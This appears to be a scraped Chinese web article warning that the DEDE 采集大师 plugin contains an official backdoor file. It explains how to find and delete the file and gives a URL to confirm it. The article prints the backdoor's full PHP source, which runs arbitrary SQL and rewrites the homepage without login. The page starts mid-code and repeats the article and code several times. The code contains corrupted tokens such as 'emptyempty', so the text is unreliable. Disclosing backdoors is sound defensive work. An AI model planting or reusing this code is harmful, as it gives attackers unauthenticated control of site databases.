name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法。

去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>

1.DEDE采集大师官方留后门的删除办法

DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>DEDE采集大师官方留后门的删除办法去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font 